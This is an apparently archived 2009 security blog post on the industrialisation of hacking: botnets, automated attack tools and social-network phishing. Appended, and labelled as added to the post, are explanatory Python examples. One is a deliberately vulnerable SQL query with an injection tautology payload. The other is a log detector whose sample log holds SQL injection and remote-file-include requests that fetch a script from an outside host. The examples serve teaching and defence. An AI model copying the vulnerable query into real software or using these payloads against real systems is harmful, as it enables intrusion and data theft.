Cyber Security Institute

Tuesday, December 08, 2009

Industrialisation Of Hacking Will Dominate The Next Decade

As we approach the dawn of a new decade, the battle lines are firmly drawn, with UK organisations squaring up to cyber criminals.  The dominant trend is the industrialisation of hacking: clear definitions of roles are developing within the hacking community, forming a supply chain that starkly resembles that of a drug cartel.  The weapons of choice will be automated tools applied through botnets.  Imperva recently tracked and analysed a compromise that affected hundreds of servers; the scale of this attack, and of others like it, is enormous and would not be achievable without total automation.

· A move from application security to data security, as cyber criminals look for new ways to bypass existing security measures and focus on obtaining valuable information.
· Increasing attacks through social networking sites, where vulnerable and less technically savvy populations are susceptible to phishing attacks and malware infection.
· An increase in credential theft.  As the face value of individual credit card records and personal identity records decreases (due to massive data breaches), attackers look for more profitable targets.  Obtaining application credentials presents an upsell opportunity, as they provide greater immediate value to the consumers of stolen data further up the food chain.
· A move from reactive to proactive security, as organisations move from sitting back and waiting to be breached to actively seeking holes and plugging them, and trying to anticipate attacks before they are realised.

Application owners need to get their act together and tackle these trends head on.  Organisations serious about protecting data will need to address not only the application layer but also the source of the data.  This means introducing new technologies, including database firewalls, file activity monitoring and the next generation of DLP products.  These tools should be combined with web application firewalls and classic DLP solutions so that the organisation can keep track of data flow across the enterprise, from source to sink.

The automation of hacking is seen as a major issue, and technical measures will be needed to combat this trend.

Organisations must look to integrate their protection tools with proactive security measures.  Admittedly these are not readily available today, but the security community is currently developing solutions, and these will become widely available over the next few years.

The next decade must see the IT security industry rise up and stand shoulder to shoulder if it is to win the fight against cyber-criminals.

The supply chain has three distinct roles:

· Botnet growers/cultivators, whose sole concern is maintaining and increasing botnet communities
· Attackers who purchase botnets for attacks aimed at extracting sensitive information (or for other, more specialised tasks)
· Cyber criminals who acquire the sensitive information for the sole purpose of committing fraudulent transactions

As with any industrialisation process, automation is the key factor for success.

Indeed we see more and more automated tools being used at all stages of the hacking process.

The proactive search for potential victims today relies on search engine bots rather than random scanning of the network.

Massive attack campaigns rely on zombies sending a predefined set of attack vectors to a list of designated victims.

Attack coordination is done through servers that host a list of commands and targets.

SQL injection, remote file include and other application-level attacks, once considered cutting-edge techniques applied manually by savvy hackers, are now bundled into software tools available for download and use by the new breed of industrial hacker.
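To make concrete what such a bundled tool automates, here is an added example (not code from the original post or from Imperva) of the classic SQL injection vector beside the parameterised query that defeats it. The table, rows and payload are constructed for illustration; the vulnerable function deliberately concatenates user input into SQL text, which is exactly the defect the automated tools probe for.

```python
"""SQL injection: the vulnerable lookup beside its hardened form (constructed example)."""
import sqlite3


def build_db():
    """Constructed in-memory table standing in for an application's user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "hash-a", "admin"), ("bob", "hash-b", "user"), ("carol", "hash-c", "user")],
    )
    return conn


def lookup_vulnerable(conn, username):
    """Deliberately vulnerable: untrusted input is spliced into the SQL text,
    so a quote in the input ends the string literal and the rest is parsed as SQL."""
    sql = "SELECT username, role FROM users WHERE username = '%s'" % username
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, username):
    """Parameterised query: the input is bound as data and never parsed as SQL."""
    sql = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# The tautology payload every point-and-click injector ships with.
PAYLOAD = "x' OR '1'='1"

if __name__ == "__main__":
    conn = build_db()
    print(lookup_vulnerable(conn, PAYLOAD))  # every row in the table
    print(lookup_hardened(conn, PAYLOAD))    # [] : no user is literally named "x' OR '1'='1"
```

The vulnerable query becomes `... WHERE username = 'x' OR '1'='1'`, which is true for every row, so the whole table is returned; the hardened version looks for a user whose name is the literal payload string and finds nothing.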

Search engines (such as Google) are becoming an increasingly vital piece of every attack campaign, from the search for potential victims, through the promotion of infected pages, to serving as a vehicle for launching the attack vectors themselves.

In the last few days, Imperva tracked and analysed a compromise that affected hundreds of servers, injecting malicious code into web pages.  The injected pages were cross-referenced with keywords that scored highly in Google search results, generating traffic and thus creating drive-by attacks.

The scale of this attack, and others like it, is enormous and would not be achievable without total automation at all stages of the process.

Organisations must realise that this growing trend leaves no web application out of reach of attackers.

Attack campaigns are constantly launched not only against high-profile applications but against any available target.

Protecting web applications using application level security solutions will become a must for larger and smaller organisations alike.

End users who want to protect their own personal data and avoid becoming part of a botnet must learn to rely on automatic OS updates and anti-malware software.

Previously attracting mainly student communities, social networking sites such as Facebook, Twitter and LinkedIn are fast infiltrating mainstream populations, with practically every man, and his dog, now ‘on Facebook’.

Elderly people and younger children, people who did not grow up with an inherent distrust of web content, may find it very difficult to distinguish between messages of a genuinely social nature and widespread attack campaigns.

Attackers will also take advantage of the information made accessible by social platforms to create more credible campaigns (e.g. making sure your phishing email appears to come from your grandchildren).

The capabilities offered by social platforms, and their growing outreach into other applications (webmail, online games), allow attackers to launch huge campaigns of a viral nature while at the same time pinpointing specific individuals.

Much as they search Google for potential target applications, attackers will scan social networks (using automated tools) for susceptible individuals, further increasing the effectiveness of their attack campaigns.

An entire set of tools that would allow us to evaluate and express personal trust in this virtual society has yet to be developed and put to use by platform owners and consumers.

Even in the case of manually executed fraud, it is evident that holding multiple sets of valid credentials for an online trading application makes the job much easier than holding the personal data of the account owners.

Consumers should protect themselves, mainly from Trojan and keylogger threats, by using the latest anti-malware software.

To date the security concept has been largely reactive: waiting for a vulnerability to be disclosed, creating a signature (or some other security rule), then cross-referencing requests against these known attack methods regardless of their context in time or source.
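The difference between that reactive, context-free matching and a check that uses source and time is easy to show on request logs, and it also illustrates the automated campaigns described earlier (zombies sending a predefined set of attack vectors to a list of victims). The following is an added example, not code from the original post or from Imperva: the log lines, the two signatures and the thresholds are all constructed for illustration. `reactive_alerts` does what the paragraph describes, one alert per request matching a signature; `campaign_alerts` adds the missing context by counting signature hits per source address inside a time window, which is what separates a scripted campaign from a lone malformed request.

```python
"""Signature matching with and without source/time context over constructed web-server log lines."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (simplified): source IP, ISO timestamp, method, request path.
SAMPLE_LOG = """\
203.0.113.10 2009-12-07T10:00:01 GET /index.php?id=1
203.0.113.10 2009-12-07T10:00:02 GET /index.php?id=1' OR '1'='1
203.0.113.10 2009-12-07T10:00:02 GET /login.php?page=http://198.51.100.7/s.txt?
203.0.113.10 2009-12-07T10:00:03 GET /news.php?id=1 UNION SELECT 1,2,3
198.51.100.20 2009-12-07T10:05:00 GET /search.php?q=union+station
192.0.2.5 2009-12-07T10:07:00 GET /index.php?id=2
192.0.2.5 2009-12-07T11:30:00 GET /index.php?id=1' OR '1'='1
"""

# Two illustrative signatures (assumed, deliberately simple): a SQL injection
# tautology or UNION probe, and a remote file include pulling a URL into a parameter.
SIGNATURES = {
    "sqli": re.compile(r"(?i)(\bunion\b.+\bselect\b|'\s*or\s*'[^']*'\s*=\s*')"),
    "rfi": re.compile(r"(?i)[?&][a-z_]+=(?:https?|ftp)://"),
}


def parse_line(line):
    """Split one constructed log line; the path is the remainder so spaces in it survive."""
    ip, ts, method, path = line.split(maxsplit=3)
    return {"ip": ip, "time": datetime.fromisoformat(ts), "method": method, "path": path}


def match_signatures(path):
    """Return the names of all signatures that fire on this request path."""
    return [name for name, rx in SIGNATURES.items() if rx.search(path)]


def reactive_alerts(log_text):
    """Context-free matching: one alert per request that matches any signature,
    regardless of who sent it or when."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        for name in match_signatures(rec["path"]):
            alerts.append((rec["ip"], name, rec["path"]))
    return alerts


def campaign_alerts(log_text, window=timedelta(seconds=60), min_hits=3):
    """Add source and time context: a source whose signature hits cluster inside
    `window` (at least `min_hits` of them) is flagged as an automated campaign.
    Returns {source_ip: peak number of hits seen inside one window}."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if match_signatures(rec["path"]):
            hits[rec["ip"]].append(rec["time"])
    campaigns = {}
    for ip, times in hits.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over sorted hit times
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= min_hits:
                campaigns[ip] = max(campaigns.get(ip, 0), count)
    return campaigns


if __name__ == "__main__":
    for alert in reactive_alerts(SAMPLE_LOG):
        print("signature hit:", alert)
    print("campaign sources:", campaign_alerts(SAMPLE_LOG))
```

On the sample data the context-free pass raises four alerts, including one for the single tautology request from 192.0.2.5; the context-aware pass flags only 203.0.113.10, which fired three different vectors within two seconds, the pattern of a scripted tool rather than a curious user. The benign search for "union station" matches neither signature, which is why the SQL pattern requires a following SELECT rather than the bare word.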
